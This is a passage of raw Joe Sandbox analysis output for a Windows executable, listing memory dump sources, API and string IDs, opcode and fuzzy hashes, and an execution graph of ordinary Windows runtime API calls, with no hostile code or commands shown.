                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: .$:
                                                                                                                                                                                                                        • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                        • Opcode ID: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
                                                                                                                                                                                                                        • Instruction ID: 547576b3689819e1a2c5b419403e432846c8679f48bd38fe5269ffc04ed33c47
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E416D22F08B5398FB10EFA19C511FC66B4AF14758F940475DE2D67AC9EFB8A442C3A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                        • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                        • Instruction ID: d66c753bd67c3ce29fe024828cb699b2c1b4bfbbd72c3cd9c5bd6152d3e5b62a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2941C372B19A8281DB20EF25E8547BDA761FB88794F804031EE5E87788EFBCD441C790
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                        • Opcode ID: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                        • Instruction ID: f27b86e704798f82389a130de5aa1d06e24b7e0d0d38627dec309f572460d2a1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4821D222F0869282EB60EF15D84427DB3A1FB84B44FD54475DAAC436C4EFBCE945C7A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                        • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                        • Instruction ID: 9ed841dac53c28837b5746426484e7a6bbf10cb9c9c24b4abbb7826414b25f72
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90115E36618B4582EB219F15F440269B7E0FB98B94F594230DBAD07BE4DFBCC951CB40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                        • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                        • Instruction ID: 64be84bf5940dd69a7e166e13244df7c6532e69273f457a77ac4d7e1cd803386
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6101842191C24386FB20FF61A86127EA390EF48708FC01075D56D836D1EFBCE545CA64

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:2.4%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:796
                                                                                                                                                                                                                        Total number of Limit Nodes:46
7ff7f24f4180 47 API calls 56369->56370 56370->56368 56370->56369 56373 7ff7f24f4480 56372->56373 56374 7ff7f24fb870 _log10_special 8 API calls 56373->56374 56375 7ff7f24f44ea 56374->56375 56375->56309 56375->56310 56377 7ff7f24f476f 56376->56377 56379 7ff7f24f471b 56376->56379 56410 7ff7f24f4300 MultiByteToWideChar MultiByteToWideChar __std_exception_destroy 56377->56410 56382 7ff7f24f475a 56379->56382 56409 7ff7f24f4300 MultiByteToWideChar MultiByteToWideChar __std_exception_destroy 56379->56409 56380 7ff7f24f477c 56380->56317 56382->56317 56384 7ff7f24f45b5 56383->56384 56385 7ff7f24f1bf0 49 API calls 56384->56385 56386 7ff7f24f4601 56385->56386 56387 7ff7f24f1bf0 49 API calls 56386->56387 56396 7ff7f24f4687 __std_exception_destroy 56386->56396 56388 7ff7f24f4640 56387->56388 56391 7ff7f24f86b0 2 API calls 56388->56391 56388->56396 56389 7ff7f24fb870 _log10_special 8 API calls 56390 7ff7f24f46dc 56389->56390 56390->56326 56390->56327 56392 7ff7f24f465a 56391->56392 56393 7ff7f24f86b0 2 API calls 56392->56393 56394 7ff7f24f4671 56393->56394 56395 7ff7f24f86b0 2 API calls 56394->56395 56395->56396 56396->56389 56397->56312 56398->56312 56399->56312 56400->56312 56401->56312 56402->56312 56403->56312 56404->56312 56405->56337 56406->56334 56407->56312 56408->56367 56409->56382 56410->56380 56411->56344 56412->56218 56414 7ff7f2506c08 56413->56414 56417 7ff7f25066e4 56414->56417 56416 7ff7f2506c21 56416->56229 56418 7ff7f25066ff 56417->56418 56419 7ff7f250672e 56417->56419 56428 7ff7f2509b24 37 API calls 2 library calls 56418->56428 56427 7ff7f250477c EnterCriticalSection 56419->56427 56422 7ff7f2506733 56424 7ff7f2506750 38 API calls 56422->56424 56423 7ff7f250671f 56423->56416 56425 7ff7f250673f 56424->56425 56426 7ff7f2504788 _fread_nolock LeaveCriticalSection 56425->56426 56426->56423 56428->56423 56429 7ffbbb896110 56430 7ffbbb896124 56429->56430 56431 7ffbbb896138 56429->56431 56433 7ffbbb896161 56430->56433 56442 7ffbbb89626c 56430->56442 56482 7ffbbb8ca4a8 
GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 56431->56482 56434 7ffbbb89616a 56433->56434 56435 7ffbbb896211 56433->56435 56437 7ffbbb8961e9 56434->56437 56438 7ffbbb89616f GetLastError 56434->56438 56475 7ffbbb8976f0 56435->56475 56436 7ffbbb8961d5 56437->56436 56444 7ffbbb8961f9 56437->56444 56440 7ffbbb896186 56438->56440 56441 7ffbbb89618b 56438->56441 56483 7ffbbb893a40 6 API calls _handle_error 56440->56483 56451 7ffbbb896197 56441->56451 56486 7ffbbb8962cc 6 API calls _handle_error 56441->56486 56442->56436 56503 7ffbbb8977ec 117 API calls 56442->56503 56485 7ffbbb893a40 6 API calls _handle_error 56444->56485 56447 7ffbbb896223 56449 7ffbbb8962b7 SetLastError 56447->56449 56487 7ffbbb88dcf0 56447->56487 56449->56436 56450 7ffbbb8961fe 56450->56436 56506 7ffbbb8962cc 6 API calls _handle_error 56450->56506 56451->56449 56453 7ffbbb8961a1 56451->56453 56453->56449 56456 7ffbbb8961aa 56453->56456 56484 7ffbbb893a40 6 API calls _handle_error 56456->56484 56458 7ffbbb896248 56500 7ffbbb8962cc 6 API calls _handle_error 56458->56500 56459 7ffbbb8962a9 56504 7ffbbb8962cc 6 API calls _handle_error 56459->56504 56460 7ffbbb8d33ef 56507 7ffbbb89f930 29 API calls __std_type_info_destroy_list 56460->56507 56461 7ffbbb8961b5 SetLastError 56461->56436 56465 7ffbbb8961d0 56461->56465 56465->56436 56466 7ffbbb8962b0 56505 7ffbbb88f040 25 API calls 2 library calls 56466->56505 56467 7ffbbb896250 56468 7ffbbb8d3408 56467->56468 56469 7ffbbb896258 56467->56469 56508 7ffbbb8962cc 6 API calls _handle_error 56468->56508 56501 7ffbbb8963a4 25 API calls memmove_s 56469->56501 56473 7ffbbb896260 56502 7ffbbb88f040 25 API calls 2 library calls 56473->56502 56509 7ffbbb8c967c 56475->56509 56477 7ffbbb89773d 56480 7ffbbb897746 56477->56480 56525 7ffbbb8c96bc 8 API calls 3 library calls 56477->56525 56478 7ffbbb897704 56478->56477 56517 7ffbbb89c7f0 EnterCriticalSection 56478->56517 56480->56436 56482->56430 56483->56441 56484->56461 56485->56450 
56486->56447 56488 7ffbbb88dd16 HeapAlloc 56487->56488 56489 7ffbbb88dd01 56487->56489 56491 7ffbbb88dd47 56488->56491 56492 7ffbbb8d0f80 56488->56492 56489->56488 56490 7ffbbb8d0f6e 56489->56490 56579 7ffbbb893440 25 API calls 2 library calls 56490->56579 56491->56458 56491->56459 56495 7ffbbb8d0fb9 56492->56495 56499 7ffbbb8d0f9f HeapAlloc 56492->56499 56580 7ffbbb883964 8 API calls _handle_error 56492->56580 56581 7ffbbb8ec860 10 API calls memmove_s 56492->56581 56582 7ffbbb893440 25 API calls 2 library calls 56495->56582 56498 7ffbbb8d0fc3 56499->56492 56499->56495 56500->56467 56501->56473 56502->56451 56503->56436 56504->56466 56505->56449 56506->56460 56507->56465 56508->56466 56510 7ffbbb8c9685 __vcrt_initialize_winapi_thunks 56509->56510 56526 7ffbbb8c9c98 56510->56526 56513 7ffbbb8c9698 56513->56478 56515 7ffbbb8c96a1 56515->56513 56533 7ffbbb8c9d04 DeleteCriticalSection 56515->56533 56550 7ffbbb89c998 56517->56550 56519 7ffbbb89c80c 56520 7ffbbb89c81c LeaveCriticalSection 56519->56520 56561 7ffbbb89c93c 79 API calls 56519->56561 56520->56478 56522 7ffbbb89c815 56562 7ffbbb89c838 GetStdHandle GetFileType 56522->56562 56524 7ffbbb89c81a 56524->56520 56525->56477 56527 7ffbbb8c9ca0 56526->56527 56529 7ffbbb8c9cd1 56527->56529 56531 7ffbbb8c9694 56527->56531 56534 7ffbbb8ca0a0 56527->56534 56539 7ffbbb8c9d04 DeleteCriticalSection 56529->56539 56531->56513 56532 7ffbbb8c9854 8 API calls 2 library calls 56531->56532 56532->56515 56533->56513 56540 7ffbbb8c9d88 56534->56540 56537 7ffbbb8ca0e0 56537->56527 56538 7ffbbb8ca0eb InitializeCriticalSectionAndSpinCount 56538->56537 56539->56531 56541 7ffbbb8c9de9 56540->56541 56548 7ffbbb8c9de4 try_get_function 56540->56548 56541->56537 56541->56538 56542 7ffbbb8c9ecc 56542->56541 56545 7ffbbb8c9eda GetProcAddress 56542->56545 56543 7ffbbb8c9e18 LoadLibraryExW 56544 7ffbbb8c9e39 GetLastError 56543->56544 56543->56548 56544->56548 56546 7ffbbb8c9eeb 56545->56546 56546->56541 56547 7ffbbb8c9eb1 FreeLibrary 56547->56548 
56548->56541 56548->56542 56548->56543 56548->56547 56549 7ffbbb8c9e73 LoadLibraryExW 56548->56549 56549->56548 56551 7ffbbb8d5b28 56550->56551 56552 7ffbbb89c9bb EnterCriticalSection 56550->56552 56575 7ffbbb893440 25 API calls 2 library calls 56551->56575 56555 7ffbbb89c9d3 56552->56555 56554 7ffbbb8d5b2d 56576 7ffbbb8a2370 73 API calls memmove_s 56554->56576 56556 7ffbbb89ca12 LeaveCriticalSection 56555->56556 56560 7ffbbb89ca0d 56555->56560 56563 7ffbbb89ca40 56555->56563 56556->56519 56558 7ffbbb8d5b39 56560->56556 56561->56522 56562->56524 56564 7ffbbb88dcf0 memmove_s 25 API calls 56563->56564 56569 7ffbbb89ca54 56564->56569 56565 7ffbbb89cb24 56577 7ffbbb88f040 25 API calls 2 library calls 56565->56577 56567 7ffbbb89cb42 56567->56555 56568 7ffbbb8d5b83 InitializeCriticalSectionAndSpinCount 56570 7ffbbb8d5b98 GetProcAddress 56568->56570 56569->56565 56569->56568 56573 7ffbbb8d5b40 56569->56573 56572 7ffbbb8d5b5c 56570->56572 56572->56568 56574 7ffbbb8d5bdb 56572->56574 56573->56570 56573->56572 56578 7ffbbb89bfe0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary try_get_function 56573->56578 56574->56574 56575->56554 56576->56558 56577->56567 56578->56573 56579->56491 56580->56492 56581->56492 56582->56498 56583 7ff7f2504938 56584 7ff7f2504952 56583->56584 56585 7ff7f250496f 56583->56585 56634 7ff7f25043d4 11 API calls _set_fmode 56584->56634 56585->56584 56586 7ff7f2504982 CreateFileW 56585->56586 56588 7ff7f25049b6 56586->56588 56589 7ff7f25049ec 56586->56589 56608 7ff7f2504a8c GetFileType 56588->56608 56637 7ff7f2504f14 46 API calls 3 library calls 56589->56637 56590 7ff7f2504957 56635 7ff7f25043f4 11 API calls _set_fmode 56590->56635 56595 7ff7f25049f1 56600 7ff7f25049f5 56595->56600 56601 7ff7f2504a20 56595->56601 56596 7ff7f250495f 56636 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 56596->56636 56598 7ff7f25049e1 CloseHandle 56603 7ff7f250496a 56598->56603 56599 7ff7f25049cb CloseHandle 56599->56603 56638 7ff7f2504368 11 API calls 2 library 
calls 56600->56638 56639 7ff7f2504cd4 56601->56639 56607 7ff7f25049ff 56607->56603 56609 7ff7f2504ada 56608->56609 56610 7ff7f2504b97 56608->56610 56611 7ff7f2504b06 GetFileInformationByHandle 56609->56611 56657 7ff7f2504e10 21 API calls _fread_nolock 56609->56657 56612 7ff7f2504bc1 56610->56612 56613 7ff7f2504b9f 56610->56613 56616 7ff7f2504bb2 GetLastError 56611->56616 56617 7ff7f2504b2f 56611->56617 56614 7ff7f2504be4 PeekNamedPipe 56612->56614 56632 7ff7f2504b82 56612->56632 56613->56616 56618 7ff7f2504ba3 56613->56618 56614->56632 56660 7ff7f2504368 11 API calls 2 library calls 56616->56660 56621 7ff7f2504cd4 51 API calls 56617->56621 56659 7ff7f25043f4 11 API calls _set_fmode 56618->56659 56620 7ff7f2504af4 56620->56611 56620->56632 56624 7ff7f2504b3a 56621->56624 56623 7ff7f24fb870 _log10_special 8 API calls 56625 7ff7f25049c4 56623->56625 56650 7ff7f2504c34 56624->56650 56625->56598 56625->56599 56628 7ff7f2504c34 10 API calls 56629 7ff7f2504b59 56628->56629 56630 7ff7f2504c34 10 API calls 56629->56630 56631 7ff7f2504b6a 56630->56631 56631->56632 56658 7ff7f25043f4 11 API calls _set_fmode 56631->56658 56632->56623 56634->56590 56635->56596 56636->56603 56637->56595 56638->56607 56640 7ff7f2504cfc 56639->56640 56648 7ff7f2504a2d 56640->56648 56661 7ff7f250ea34 51 API calls 2 library calls 56640->56661 56642 7ff7f2504d90 56642->56648 56662 7ff7f250ea34 51 API calls 2 library calls 56642->56662 56644 7ff7f2504da3 56644->56648 56663 7ff7f250ea34 51 API calls 2 library calls 56644->56663 56646 7ff7f2504db6 56646->56648 56664 7ff7f250ea34 51 API calls 2 library calls 56646->56664 56649 7ff7f2504e10 21 API calls _fread_nolock 56648->56649 56649->56607 56651 7ff7f2504c50 56650->56651 56652 7ff7f2504c5d FileTimeToSystemTime 56650->56652 56651->56652 56653 7ff7f2504c58 56651->56653 56652->56653 56654 7ff7f2504c71 SystemTimeToTzSpecificLocalTime 56652->56654 56655 7ff7f24fb870 _log10_special 8 API calls 56653->56655 56654->56653 56656 7ff7f2504b49 56655->56656 
56656->56628 56657->56620 56658->56632 56659->56632 56660->56632 56661->56642 56662->56644 56663->56646 56664->56648

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF7F24F3534), ref: 00007FF7F24F3411
  • Part of subcall function 00007FF7F24F29E0: GetLastError.KERNEL32(?,?,?,00007FF7F24F342E,?,00007FF7F24F3534), ref: 00007FF7F24F2A14
  • Part of subcall function 00007FF7F24F29E0: FormatMessageW.KERNEL32(?,?,?,00007FF7F24F342E), ref: 00007FF7F24F2A7D
  • Part of subcall function 00007FF7F24F29E0: MessageBoxW.USER32 ref: 00007FF7F24F2ACF
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1631347669.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000D.00000002.1631310735.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631384122.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631469895.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631469895.00007FF7F2533000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631534933.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7f24f0000_21AB.jbxd
Similarity
• API ID: Message$ErrorFileFormatLastModuleName
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\$$3&KP
• API String ID: 517058245-2522025935
• Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
• Instruction ID: 324d46c5197e621f43712a0d9c02314df2b84dde057860ffdb56dd83e582fb46
• Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
• Instruction Fuzzy Hash: C2219261B0858291FB21FB24E8513B9A250BFD9795FC00236DA7D8B5D5EFECE904C7A0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.1631347669.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000D.00000002.1631310735.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631384122.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631469895.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631469895.00007FF7F2533000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631534933.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7f24f0000_21AB.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
• Instruction ID: 8168b787d564d7f34d58842c04def89b53a1d686124115137c9bfa2d16a5a0f4
• Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
• Instruction Fuzzy Hash: 6951E462B0924247FB28AE25940067AA291FFC4FB4F954634DE7C037D6CEFCE841C6A0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.1631347669.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000D.00000002.1631310735.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631384122.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631469895.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631469895.00007FF7F2533000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1631534933.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7f24f0000_21AB.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
• Instruction ID: 081db42f4627dccf1dcac8a50edd1f058ea2e01dfeb2b7bcc95d66e4399bf3a7
• Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
• Instruction Fuzzy Hash: 3C21A132A167068AEB24EF64C8446FC73B0FB04718F84067AD62C0BAC5EFB8D444C7A0